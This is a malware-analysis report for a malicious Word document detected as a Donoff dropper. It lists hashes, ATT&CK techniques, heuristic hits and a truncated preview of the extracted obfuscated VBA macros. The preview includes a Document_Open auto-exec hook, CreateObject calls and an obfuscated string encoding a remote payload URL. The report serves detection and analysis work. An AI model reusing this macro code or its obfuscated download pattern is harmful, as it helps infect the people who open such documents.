Office (OLE) malware analysis — malicious · 935152b79d18fb4a

MALICIOUS

Office (OLE)

144.0 KB Created: 2016-06-02 02:12:00 Authoring application: Microsoft Office Word First seen: 2017-12-09

MD5: 298799fc3c4c34366d2d223afcd1999d SHA-1: b0e53fb6a4e90ad8fd37a1c46b84a5f8bad03538 SHA-256: 935152b79d18fb4a5f0dcdfa47422dfd2824680c812a12f5e91b9df7810f2616

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1105 Ingress Tool Transfer

The sample contains VBA macros, specifically a Document_Open macro, which is a common technique for executing malicious code upon opening a document. The presence of CreateObject and CallByName calls further indicates the execution of arbitrary code. ClamAV detection as 'Doc.Dropper.Donoff-5743527-0' strongly suggests its role as a dropper for further malicious payloads.

Heuristics 7

ClamAV: Doc.Dropper.Donoff-5743527-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Donoff-5743527-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
CallByName call high OLE_VBA_CALLBYNAME

CallByName call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In document text (OLE body)
- http://ns.adobe.com/xap/1.0/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 18950 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	18950 bytes
SHA-256: `20a877faaf274bee75f536ac927c6842e987b74c22872480e1827a120f48abe2`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Function ociLuics(ByVal omJPwaxQR As Integer) As String OzfRei JPnBWcIgQj 8198 If UZPnPnFPrLoI(8828, "JYEGvE0wjdjmxWfy9yE7dm") Then eWzPh dlnOmnEIBFhxwo = 7276 btERufe 4905, "nMhNqzsRswjTTFzd0jQBO38KdE" lrbsKjj End If TcSLblZzSoLUyp = "zkxcaXSDHvAMUvqxTfWDU1bpQFjQNTh" ociLuics = "aaE3CEkKH9kc5ZjuSLb90ZE50O" End Function Private Function EEGcZR() As Integer GGkzZL False oaXTOYoUklv 2233, "iHUi8YonAsrRcRE1cxsO5Sh7" TVFvoHTOWoUpew EEGcZR = 5204 End Function Private Function dAfdQEV() As String If LVXvawRYWJtmm(9126) Then BaCYJGQf = 8634 OQQFxPVDYaD Else fjBcFZ True mJxMcBJB mpcgIqO End If KvCOr = True dAfdQEV = "sD9O5cyyxKT92gd4m5Rcn1r" End Function Private Sub Document_Open() CCuJzInKYvArg.aiTDrqxt End Sub Private Function dbyWvzOcol(ByVal PqVDEpBctGfueX As String, ByVal rzFpMAbPxc As Integer) As Integer qYgNriJMrWy 4374 ZyDEMBcf dJvPePoYpjcLZ If PCRuwyqt Then bCWtCOgKaFrFq Else HSpCDNA = "eenDpTPA8iAMlTadOl5068G7" qJtLaFia baKxcwJPQaDYl End If dbyWvzOcol = 1337 End Function Attribute VB_Name = "CCuJzInKYvArg" Private Function bLhYb(ByVal OklhZJQig As Object, ByVal KlKaTxi As Boolean) As Object Dim naZpX As Integer htJHkJTALdi = False Set bLhYb = OklhZJQig End Function Public Sub aiTDrqxt() On Error GoTo cvwcRas nCVsOzVAhm.PfXGOUi eWTWgo = True nCVsOzVAhm.VqIHwulCqpYd XutCexae Exit Sub lZvUNA = 5724 cvwcRas: End Sub Private Sub XutCexae() Dim QuHzOWFAaVc As String Dim jMbgCzsXBhkava As Integer eKKKPJVhEX = "31oPXTmmVh1dciUjq" vieEKRZsAtemPS 5737, DVABmnHJaKqB.LlwoVGDXrs, YNUvZC UpHNpaM = 6867 DVABmnHJaKqB.fGBAmHpbhlKet 6258, DVABmnHJaKqB.LlwoVGDXrs End Sub Public Function wjiclADfraxE(ByVal WVTVsJEAlHsixU As String) As Object Dim mxFICXx As String Dim sAYDGYZ As Boolean JjImGmDKPxhqsI = "dtKbtUjz23LStt3LezCokzzO" Set wjiclADfraxE = bLhYb(CreateObject(WVTVsJEAlHsixU), True) End Function Private Function pNZld(ByVal whfAYPgNZW As String) As Integer If kKjxs(8404, "tJMGahoLDuMaAv862pRZ9") Then zblPry = 7354 XnVqDQNHxbSV gLHzh lvQLYsdRMuvyUN XGIWAcvPzpEQ = "tuTkxof7YDu36clnaRcioy2QiEeQlkE" Else kdiyNy lKKMyKmNnbbwDU "Y9V6ijNxEK4f0MSK4L", 4897 kHWCzJXNDXBDz End If maaKB 4147, 3708, 9625 pNZld = 2465 End Function Private Sub vieEKRZsAtemPS(ByVal fCJMswkExxA As Integer, ByVal qplcHkrCfjz As String, ByVal RhitmwaIRW As String) Dim EmZlioleoY As Integer Set ftODBG = FFiTeqb.FqPMngOGLm(RhitmwaIRW, 7913, True) FFiTeqb.TURyMdz "NwnIqNpfcXaecRg9os0Lp", YQpwtTgiFPGmN, 3895, ftODBG GyqWpBDJw = True DVABmnHJaKqB.HUnQMCBsCVVy 6655, FdtHzf.rDoQHGtJbVUYyC(2621, ftODBG, "mmEcXGvrDUxlT31sEdL8bsMz5xNjUZInP", hsVXQ.bzpbqAmPyUXm("R3eUgs/po3n3UsCeUBgodgyc", "rUg9cC/3")), "RnYJdwhq2gT5lny4dIeHpl", qplcHkrCfjz End Sub Private Function YNUvZC() As String YNUvZC = hsVXQ.bzpbqAmPyUXm("RhtXt5Gp:MM//GjncjRb5-jtrveGMnMdMsv.cGoMm5X/cRMatRXalvovgXv/oRf5fjGicvXeX1v2.RvdvaXt", "RvX5GjM") End Function Private Function YQpwtTgiFPGmN() As String YQpwtTgiFPGmN = hsVXQ.bzpbqAmPyUXm("TCTanTh'tSG d:ojwGunl8uoa:8d: bhi18nSar1y1L f:SiLlLe", "L8G:TjS1uh") End Function Attribute VB_Name = "hsVXQ" Private Sub ittYqVla() UYxwRMS False, 4187, False yFFKIMi 3928, True, 3091 End Sub Public Function Kahdaa(ByVal SwXylFx As String, ByVal JpMKysNAYEfyV As Boolean, ByVal ZiNcZreu As String) As String Dim FIhOMZxAXPMT As Boolean Dim YNocZpmlvZGI As Integer RIaFgPqnEgq = "kb2OSuNBIdxBBkUdIlMEuy" Kahdaa = SwXylFx & ZiNcZreu End Function Private Sub melxHETHqYwxv() FrGRbLaNaXgHV 3835, "DECzvpGWuXWlsUP04", 8764 CZbQGXxXgn 5484, 760, 7177 CCDFjnMSBw = 3182 NxhUZF End Sub Private Function AftNHk(ByVal bZCavdNg As String, ByVal XntBZzjzpiuh As String) As String If Not cgftb.DqQtUUiJM("1ixk7kpAJB5kJw7gNf1T5MiNR", XntBZzjzpiuh, bZCavdNg, "BvFpGa8Kl2gNHi8Hfi") Then AftNHk = XntBZ ... (truncated)

SHA-256: 20a877faaf274bee75f536ac927c6842e987b74c22872480e1827a120f48abe2

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function ociLuics(ByVal omJPwaxQR As Integer) As String
OzfRei
JPnBWcIgQj 8198
If UZPnPnFPrLoI(8828, "JYEGvE0wjdjmxWfy9yE7dm") Then
eWzPh
dlnOmnEIBFhxwo = 7276
btERufe 4905, "nMhNqzsRswjTTFzd0jQBO38KdE"
lrbsKjj
End If
TcSLblZzSoLUyp = "zkxcaXSDHvAMUvqxTfWDU1bpQFjQNTh"
ociLuics = "aaE3CEkKH9kc5ZjuSLb90ZE50O"
End Function
Private Function EEGcZR() As Integer
GGkzZL False
oaXTOYoUklv 2233, "iHUi8YonAsrRcRE1cxsO5Sh7"
TVFvoHTOWoUpew
EEGcZR = 5204
End Function
Private Function dAfdQEV() As String
If LVXvawRYWJtmm(9126) Then
BaCYJGQf = 8634
OQQFxPVDYaD
Else
fjBcFZ True
mJxMcBJB
mpcgIqO
End If
KvCOr = True
dAfdQEV = "sD9O5cyyxKT92gd4m5Rcn1r"
End Function
Private Sub Document_Open()
CCuJzInKYvArg.aiTDrqxt
End Sub
Private Function dbyWvzOcol(ByVal PqVDEpBctGfueX As String, ByVal rzFpMAbPxc As Integer) As Integer
qYgNriJMrWy 4374
ZyDEMBcf
dJvPePoYpjcLZ
If PCRuwyqt Then
bCWtCOgKaFrFq
Else
HSpCDNA = "eenDpTPA8iAMlTadOl5068G7"
qJtLaFia
baKxcwJPQaDYl
End If
dbyWvzOcol = 1337
End Function

Attribute VB_Name = "CCuJzInKYvArg"
Private Function bLhYb(ByVal OklhZJQig As Object, ByVal KlKaTxi As Boolean) As Object
Dim naZpX As Integer
htJHkJTALdi = False
Set bLhYb = OklhZJQig
End Function
Public Sub aiTDrqxt()
On Error GoTo cvwcRas
nCVsOzVAhm.PfXGOUi
eWTWgo = True
nCVsOzVAhm.VqIHwulCqpYd
XutCexae
Exit Sub
lZvUNA = 5724
cvwcRas:
End Sub
Private Sub XutCexae()
Dim QuHzOWFAaVc As String
Dim jMbgCzsXBhkava As Integer
eKKKPJVhEX = "31oPXTmmVh1dciUjq"
vieEKRZsAtemPS 5737, DVABmnHJaKqB.LlwoVGDXrs, YNUvZC
UpHNpaM = 6867
DVABmnHJaKqB.fGBAmHpbhlKet 6258, DVABmnHJaKqB.LlwoVGDXrs
End Sub
Public Function wjiclADfraxE(ByVal WVTVsJEAlHsixU As String) As Object
Dim mxFICXx As String
Dim sAYDGYZ As Boolean
JjImGmDKPxhqsI = "dtKbtUjz23LStt3LezCokzzO"
Set wjiclADfraxE = bLhYb(CreateObject(WVTVsJEAlHsixU), True)
End Function
Private Function pNZld(ByVal whfAYPgNZW As String) As Integer
If kKjxs(8404, "tJMGahoLDuMaAv862pRZ9") Then
zblPry = 7354
XnVqDQNHxbSV
gLHzh
lvQLYsdRMuvyUN
XGIWAcvPzpEQ = "tuTkxof7YDu36clnaRcioy2QiEeQlkE"
Else
kdiyNy
lKKMyKmNnbbwDU "Y9V6ijNxEK4f0MSK4L", 4897
kHWCzJXNDXBDz
End If
maaKB 4147, 3708, 9625
pNZld = 2465
End Function
Private Sub vieEKRZsAtemPS(ByVal fCJMswkExxA As Integer, ByVal qplcHkrCfjz As String, ByVal RhitmwaIRW As String)
Dim EmZlioleoY As Integer
Set ftODBG = FFiTeqb.FqPMngOGLm(RhitmwaIRW, 7913, True)
FFiTeqb.TURyMdz "NwnIqNpfcXaecRg9os0Lp", YQpwtTgiFPGmN, 3895, ftODBG
GyqWpBDJw = True
DVABmnHJaKqB.HUnQMCBsCVVy 6655, FdtHzf.rDoQHGtJbVUYyC(2621, ftODBG, "mmEcXGvrDUxlT31sEdL8bsMz5xNjUZInP", hsVXQ.bzpbqAmPyUXm("R3eUgs/po3n3UsCeUBgodgyc", "rUg9cC/3")), "RnYJdwhq2gT5lny4dIeHpl", qplcHkrCfjz
End Sub
Private Function YNUvZC() As String
YNUvZC = hsVXQ.bzpbqAmPyUXm("RhtXt5Gp:MM//GjncjRb5-jtrveGMnMdMsv.cGoMm5X/cRMatRXalvovgXv/oRf5fjGicvXeX1v2.RvdvaXt", "RvX5GjM")
End Function
Private Function YQpwtTgiFPGmN() As String
YQpwtTgiFPGmN = hsVXQ.bzpbqAmPyUXm("TCTanTh'tSG d:ojwGunl8uoa:8d: bhi18nSar1y1L f:SiLlLe", "L8G:TjS1uh")
End Function

Attribute VB_Name = "hsVXQ"
Private Sub ittYqVla()
UYxwRMS False, 4187, False
yFFKIMi 3928, True, 3091
End Sub
Public Function Kahdaa(ByVal SwXylFx As String, ByVal JpMKysNAYEfyV As Boolean, ByVal ZiNcZreu As String) As String
Dim FIhOMZxAXPMT As Boolean
Dim YNocZpmlvZGI As Integer
RIaFgPqnEgq = "kb2OSuNBIdxBBkUdIlMEuy"
Kahdaa = SwXylFx & ZiNcZreu
End Function
Private Sub melxHETHqYwxv()
FrGRbLaNaXgHV 3835, "DECzvpGWuXWlsUP04", 8764
CZbQGXxXgn 5484, 760, 7177
CCDFjnMSBw = 3182
NxhUZF
End Sub
Private Function AftNHk(ByVal bZCavdNg As String, ByVal XntBZzjzpiuh As String) As String
If Not cgftb.DqQtUUiJM("1ixk7kpAJB5kJw7gNf1T5MiNR", XntBZzjzpiuh, bZCavdNg, "BvFpGa8Kl2gNHi8Hfi") Then
AftNHk = XntBZ
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.